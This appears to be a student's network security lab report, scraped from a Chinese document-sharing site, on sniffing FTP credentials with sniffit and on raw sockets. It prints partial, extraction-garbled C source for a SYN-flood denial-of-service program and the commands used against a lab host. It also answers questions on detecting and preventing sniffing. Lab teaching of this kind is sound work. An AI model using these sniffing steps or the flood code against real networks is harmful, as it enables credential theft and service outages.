




已阅读5页,还剩9页未读, 继续免费阅读
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
实验总成绩: 装 订 线报告份数: 西安邮电大学 通信与信息工程学院 网络攻防实验报告专业班级: 学生姓名: 学号(班内序号): 2014 年 3 月 20 日实验三 网络嗅探一 明文嗅探1. 实验目的(1).掌握嗅探器基本概念。(2).掌握嗅探器的基本原理。2.技术分析(1).嗅探器的基本概念嗅探器(sniffit)是利用计算机的网络接口截获目的地为其它计算机的数据报文的一种技术。工作在网络的底层,能够把网络传输的全部数据记录下来。从整个信息安全角度来看的话,可以把扫描器大约分为三类:1).数据库安全扫描器数据库安全扫描器是针对数据库管理系统的安全评估工具,如Database Scanner.用户可利用它来建立数据库的安全规则,通过运行审核程序来提供有关安全风险和位置的简明报告。2).系统安全扫描器系统安全扫描器是针对主机的安全评估工具,如System Scanner。它是基于主机安全评估策略来分析系统漏洞,包括系统错误配置和普通配置信息。用户通过扫描结果对系统漏洞进行修补,直到扫描报告中不再出现任何警告。3).网络安全扫描器网络安全扫描器是针对于网络服务/应用服务/网络设备和网络协议等安全评估工具。通常我们将基于网络的扫描成为主动式扫描,基于主机的扫描称为被动式扫描。一个网络扫描器至少应该具备如下三项功能:I. 发现一个主机和网络;II. 发现主机后,扫描它正在运行的操作系统和各项服务;III. 测试这些服务中是否存在漏洞。嗅探侦听主要有两种途径,一种是将侦听工具软件放到网络连接的设备或者放到可以控制网络连接设备的电脑上,这里的网络连接设备,比如网关服务器比如路由器。当然要实现这样的效果可能也需要其他黑客技术,比如通过木马方式将嗅探器发给某个网络管理员,使其不自觉的为攻击者进行了安装。另外一种是针对不安全的局域网(采用交换hub实现),放到个人电脑上就可以实现对整个局域网的侦听,这里的原理是这样的,共享hub获得一个子网内需要接收的数据时,并不是直接发送到指定主机,而是通过广播方式发送到每个电脑,对于处于接收者地位的电脑就会处理该数据,而其他非接收者的电脑就会过滤这些数据,这些操作与电脑操作者无关,是系统自动完成的,但是电脑操作者如果有意的话,他是可以将那些原本不属于他的数据打开的。(2).嗅探器工作的基本原理在一个实际的系统中,数据的收发是由网卡来完成的,网卡接收到传输来的数据,网卡内的单片程序接收数据帧的目的MAC地址,根据计算机上的网卡驱动程序设置的接收模式判断该不该接收,认为该接收就接收后产生中断信号通知CPU,认为不该接收就丢掉不管,所以不该接收的数据网卡就截断了,计算机根本就不知道。CPU得到中断信号产生中断,操作系统就根据网卡的驱动程序设置的网卡中断程序地址调用驱动程序接收数据,驱动程序接收数据后放入信号堆栈让操作系统处理。而对网卡来说一般有四种接收模式:1).广播方式:该模式下的网卡能够接收网络中的广播信息。2).组播方式:设置在该模式下的网卡能够接收组播数据。3).直接方式:在这种模式下,只有目的网卡才能接收该数据。4).混杂模式:在这种模式下的网卡能够接收一切通过它的数据,而不管该数据是否是传给它的。总结:首先,在以太网中是基于广播方式传送数据的,也就是说,所有的物理信号都要经过我的机器。再次,网卡可以置于一种模式叫混杂模式(promiscuous),在这种模式下工作的网卡能够接收到一切通过它的数据,而不管实际上数据的目的地址是不是它。这实际上就是SNIFF工作的基本原理:让网卡接收一切它所能接收的数据。3.实验步骤:阅读理论知识,并通过平台进行实验:通过控制台,打开实验环境:主机靶机IP:82被攻击靶机IP:81在显示连接成功以后,就可以通过“连接”按钮进入到实验环境中。进入实验环境后,进行以下操作:(1).进入靶机81,开启xannp中的ftp服务,ftp账户为bluedon,密码为123456.(已设置好)(2).进入靶机82,打开终端。输入以下命令:sniffit a A p t 81然后打开另一个终端,ftp连接到81,输入账户和密码登入FTP服务器。(3).观察sniffit命令下的嗅探信息,从中发现,已经嗅探出账户和密码。4.实验结果输入以下命令:sniffit a A p t 81输入以下命令:ftp 815.问题答疑(1).嗅探会造成哪些危害?1).捕获口令.Sniffer可以记录到明文传送的userid和passwd,即使网络传送过程中使用了加密的数据,Sniffer记录的数据一样有可能使入侵者想办法算出你的算法.一般Sniffer只嗅探每个报文的前200到300个字节,而用户名和口令都包含在这一部分中. 2).能够捕获专用的或者机密的信息.比如金融帐号,许多用户很放心在网上使用自己的信用卡或现金帐号,然而Sniffer可以很轻松截获在网上传送的用户姓名,口令,信用卡号码,截止日期,帐号和pin.比如偷窥机密或敏感的信息数据,通过拦截数据包,入侵者可以很方便记录别人之间敏感的信息传送,或者干脆拦截整个的email会话过程. 3).可以用来危害网络邻居的安全,或者用来获取更高级别的访问权限.一旦入侵者得到用户名和口令,必然可以通过信任关系危害网络邻居的安全,既而获取更高级别的访问权限. 4).窥探低级的协议信息.通过对底层的信息协议记录,比如记录两台主机之间的网络接口地址,远程网络接口IP地址,IP路由信息和TCP连接的字节顺序号码等.这些信息由入侵者掌握后将对网络安全构成极大的危害,例如通常的IP地址欺骗就是要求准确插入TCP连接的字节顺序号.(2).如何检测并防范网络嗅探?1).上网的时候,采用ssl加密传送数据。2).采用ssh代替ftp,尽量不要使用telnet等服务。3).向同一局域网中采用ip与mac绑定,防止有人搞破坏。4).利用反嗅探工具检测嗅探是否存在并作出处理。5).优化网络结构,如进行网络分段,使用交换式集线器,划分wlan使以太通信变成点到点通信等。二 原始套接字1. 场景描述登录控制台开启并连接Linux靶机,编译dos.c并运行,对Windows靶机进行攻击,Windows靶机上使用sniffer进行监控(dos.c在Linux-root-gonfang-原始套接字,sniffer在Windows靶机上)。2. 实验目的1).掌握原始套接字的基本概念。2).掌握原始套接字程序和普通的TCP/IP程序区别。3).掌握原始套接字发送和接收报文的流程。4).掌握常用网络分析抓包工具的使用。3. 技术分析(1).原始套接字的基本概念通常情况下程序设计人员接触的网络知识限于如下两种:1).流式套接字(SOCK_STREAM),它是一种面向连接的套接字,对应于TCP应用程序,提供了面向连接的、可靠的、数据无错并且无重复的数据发送服务,而且接收数据的顺序和发送数据的顺序是相同的。2)数据报套接字(SOCK_DGRAM),它是一种无连接的套接字,对应于UDP应用程序,它以独立的数据包形式发送数据(数据包长度不能大于32KB),不提供正确性检查,也不保证各数据包的发送顺序和接收顺序相同,因此,可能出现数据的重发、丢失等现象。除了以上两种基本的套接字外还有一类原始套接字,用于直接访问协议的较低层,它是一种对原始网络报文进行处理的套接字。常用于检验新的协议实现或访问现有服务中配置的新设备,一般不提倡直接使用原始套接字。原始套接字(SOCK_RAW)是一种不同于SOCK_STREAM、SOCK_DGRAM的套接字,它实现于系统核心。它的主要功能包括:1.普通的套接字无法处理ICMPIGMP等网络报文,而SOCK_RAW可以;2.SOCK_RAW也可以处理特殊的IPv4报文;3.利用原始套接字,可以通过IP_HDRINCL套接字选项由用户构造IP头。总体来说,SOCK_RAW可以处理普通的网络报文之外,还可以处理一些特殊协议报文以及操作IP层及其以上的数据。(2).原始套接字发送报文有如下的原则:通常情况下可以使用sendto()函数并指定发送目的地址发送数据,当已经bind()了目标地址的时候可以使用write()或者send()发送数据。如果使用setsockopt()设置了选项IP_PINCL,则发送的数据缓冲区指向IP头部第一个字节的头部,用户发送的数据包含IP头部之后的所有数据,需要用户自己填写IP头部和计算校验和及所包含数据的处理和计算。如果没有设置IP_RINCL,则发送缓冲区指向IP头部后面数据区域的第一个字节,不需要用户填写IP头部,IP头部的填写工作由内核进行,内核还进行校验和的计算。(3).接收报文的一些特点,主要有如下几个:对于ICMP的协议,绝大部分数据可以通过原始套接字获得,例如回显请求、响应,时间戳请求等。接收的UDP和TCP协议的数据不会传给任何原始套接字接口,这些协议的数据需要通过数据链路层获得。如果IP以分片形式到达,则所有分片都已经接收到并重组后才传给原始套接字。内核不能识别的协议、格式等传给原始套接字,因此,可以使用原始套接字定义用户自己的协议格式。4.实验步骤阅读理论知识,通过平台进行实验。通过控制台,打开实验环。主机靶机IP:8被攻击靶机IP:7进入8实验环境后,进行以下操作:(10)。进入相应目录,将文件名由dos.c改为03113096.c,查看03113096.c文件,分析原始套接字攻击程序源代码。路径如下:cd gongfang/Raw-socket(2).编译源代码对主机7进行攻击测试1).首先连接到7的主机,打开软件sniffer,点击监视器,查看网络数据包情况。2).在主机8的终端输入以下攻击命令:./dos 73).回到7主机查看数据包情况,数据包的增加速度变得很快,以每秒几万个数据包在增加。4).关闭命令后,在测试一下,发现数据包增加速度变正常了。5.实验结果1). cd gongfang/Raw-socket2).编译源代码:rootdebian:# cd gongfangrootdebian:/gongfang# cd Raw-socket/rootdebian:/gongfang/Raw-socket# lsdos dos.c Raw-socketrootdebian:/gongfang/Raw-socket# mv dos.c 03113096.crootdebian:/gongfang/Raw-socket# ls03113096.c dos Raw-socketrootdebian:/gongfang/Raw-socket# cat 03113096.c#include ;#include ;#include ;#include ;#include ;#include ;#include ;#include ;#include ;#define DESTPORT 80 /* 要攻击的端口(WEB) */#define LOCALPORT 8888void send_tcp(int sockfd,struct sockaddr_in *addr);unsigned short check_sum(unsigned short *addr,int len);int main(int argc,char *argv)int sockfd;struct sockaddr_in addr;struct hostent *host;int on=1;if(argc!=2)fprintf(stderr,Usage:%s hostnamena,argv0);exit(1);bzero(&addr,sizeof(struct sockaddr_in);addr.sin_family=AF_INET;addr.sin_port=htons(DESTPORT);if(inet_aton(argv1,&addr.sin_addr)=0)host=gethostbyname(argv1);if(host=NULL)fprintf(stderr,HostName Error:%sna,hstrerror(h_errno);exit(1);addr.sin_addr=*(struct in_addr *)(host-h_addr_list0);/* 使用IPPROTO_TCP 创建一个TCP 的原始套接字 */sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);if(sockfdip_v=IPVERSION; /* 版本一般的是 4 */ip-ip_hl=sizeof(struct ip)2; /* IP 数据包的头部长度 */ip-ip_tos=0; /* 服务类型 */ip-ip_len=htons(head_len); /* IP 数据包的长度 */ip-ip_id=0; /* 让系统去填写吧 */ip-ip_off=0; /* 和上面一样,省点时间 */ip-ip_ttl=MAXTTL; /* 最长的时间 255 */ip-ip_p=IPPROTO_TCP; /* 我们要发的是 TCP 包 */ip-ip_sum=0; /* 校验和让系统去做 */ip-ip_dst=addr-sin_addr; /* 我们攻击的对象 */* 开始填写TCP 数据包 */tcp=(struct tcphdr *)(buffer +sizeof(struct ip);tcp-source=htons(LOCALPORT);tcp-dest=addr-sin_port; /* 目的端口 */tcp-seq=random();tcp-ack_seq=0;tcp-doff=5;tcp-syn=1; /* 我要建立连接 */tcp-check=0;/* 好了,一切都准备好了.服务器,你准备好了没有? _ */while(1)/* 你不知道我是从那里来的,慢慢的去等吧! *
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 电商客服职位年度绩效考核标准
- 一次集体活动的难忘瞬间叙述文12篇
- 高职信息技术实训指导书
- 养殖业与农业结合的合作协议
- 仓储服务租赁合同协议
- 2025年学历类自考房地产法-管理会计(一)参考题库含答案解析(5卷)
- 中学生道德规范与法律意识教育方案
- 2025年放射学影像学解读技能检测试卷答案及解析
- 2025年骨科创伤患者手术并发症预防模拟考试答案及解析
- 2024年中考英语模拟试卷及详解
- 《智慧物流与供应链基础》课件 第一章 智慧物流与智慧供应链
- 计算机二级MySQL真题下载试题及答案
- 佛山市顺德区容桂街道专业电镀产业发展规划(2023-2035年)环境影响报告书(简本)
- 高效人员管理的5大核心思路与方法
- 《物业管理条例》教学课件
- TCNAS 28─2023成人住院患者静脉血栓栓塞症的预防护理
- (高清版)DB3301∕T 0046-2017 智精残疾人托养机构护理服务规范
- 基层司法所规范化建设
- 无人机的专业知识课件
- 经济学基础课件 项目三 支付结算法律制度
- 城市低空安全监管平台解决方案
评论
0/150
提交评论